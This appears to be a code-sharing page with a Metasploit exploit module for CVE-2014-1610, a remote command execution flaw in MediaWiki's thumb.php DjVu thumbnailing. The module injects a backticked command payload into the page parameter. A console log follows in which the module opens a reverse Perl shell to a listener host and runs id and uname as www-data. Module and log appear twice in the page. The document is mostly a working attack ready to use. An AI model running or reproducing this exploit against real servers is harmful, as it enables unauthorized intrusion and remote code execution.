brandonprry · December 28, 2016 11:46
diff --git a/mediawiki_djvu_thumb_exec.rb b/mediawiki_djvu_thumb_exec.rb
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mediawiki thumb.php Djvu Remote Command Execution",
      'Description'    => %q{
      Mediawiki uses djvulibre to convert djvu files to jpeg thumbnails.
      The page parameter when creating these thumbnails is vulnerable to remote
      command execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry'
        ],
      'References'     =>
        [
          ['CVE', '2014-1610']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x20&",

          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python',
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Mediawiki', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 28 2014",
      'DefaultTarget'  => 0))

      register_options(
      [
         OptString.new('FILENAME', [ true, 'Name of the Djvu image to thumbnail', 'example.djvu' ]),
         OptString.new('TARGETURI', [ true, 'Relative URI of the Mediawiki install', '/mediawiki/']),
      ], self.class)

  end

  def exploit
    send_request_cgi({
      'uri' => normalize_uri(target_uri, '/thumb.php?f=' + datastore['FILENAME'] + "&width=100&page=2`"+payload.encoded+"`"),
    })
  end

 end

 __END__
 msf exploit(mediawiki_djvu_thumb_exec) > show options

 Module options (exploit/linux/http/mediawiki_djvu_thumb_exec):

 Name       Current Setting  Required  Description
 ----       ---------------  --------  -----------
 FILENAME   superhero.djvu   yes       Name of the Djvu image to thumbnail
 Proxies                     no        Use a proxy chain
 RHOST      192.168.1.48     yes       The target address
 RPORT      80               yes       The target port
 TARGETURI  /mediawiki/      yes       Relative URI of the Mediawiki install
 VHOST                       no        HTTP server virtual host


 Payload options (cmd/unix/reverse_perl):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 LHOST  192.168.1.31     yes       The listen address
 LPORT  4444             yes       The listen port


 Exploit target:

 Id  Name
 --  ----
 0   Mediawiki


 msf exploit(mediawiki_djvu_thumb_exec) > exploit

 [*] Started reverse handler on 192.168.1.31:4444 
 [*] Command shell session 2 opened (192.168.1.31:4444 -> 192.168.1.48:58049) at 2014-01-31 19:48:38 -0600

 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 uname -a
 Linux ubuntu 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
	super(update_info(info,
	'Name' => "Mediawiki thumb.php Djvu Remote Command Execution",
	'Description' => %q{
	Mediawiki uses djvulibre to convert djvu files to jpeg thumbnails.
	The page parameter when creating these thumbnails is vulnerable to remote
	command execution.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'Brandon Perry'
	],
	'References' =>
	[
	['CVE', '2014-1610']
	],
	'Payload' =>
	{
	'BadChars' => "\x20&",

	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'generic perl python',
	}
	},
	'Platform' => ['unix'],
	'Arch' => ARCH_CMD,
	'Targets' =>
	[
	['Mediawiki', {}],
	],
	'Privileged' => false,
	'DisclosureDate' => "Jan 28 2014",
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('FILENAME', [ true, 'Name of the Djvu image to thumbnail', 'example.djvu' ]),
	OptString.new('TARGETURI', [ true, 'Relative URI of the Mediawiki install', '/mediawiki/']),
	], self.class)

	end

	def exploit
	send_request_cgi({
	'uri' => normalize_uri(target_uri, '/thumb.php?f=' + datastore['FILENAME'] + "&width=100&page=2`"+payload.encoded+"`"),
	})
	end

	end

	__END__
	msf exploit(mediawiki_djvu_thumb_exec) > show options

	Module options (exploit/linux/http/mediawiki_djvu_thumb_exec):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	FILENAME superhero.djvu yes Name of the Djvu image to thumbnail
	Proxies no Use a proxy chain
	RHOST 192.168.1.48 yes The target address
	RPORT 80 yes The target port
	TARGETURI /mediawiki/ yes Relative URI of the Mediawiki install
	VHOST no HTTP server virtual host


	Payload options (cmd/unix/reverse_perl):

	Name Current Setting Required Description
	---- --------------- -------- -----------
	LHOST 192.168.1.31 yes The listen address
	LPORT 4444 yes The listen port


	Exploit target:

	Id Name
	-- ----
	0 Mediawiki


	msf exploit(mediawiki_djvu_thumb_exec) > exploit

	[*] Started reverse handler on 192.168.1.31:4444
	[*] Command shell session 2 opened (192.168.1.31:4444 -> 192.168.1.48:58049) at 2014-01-31 19:48:38 -0600

	id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
	uname -a
	Linux ubuntu 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux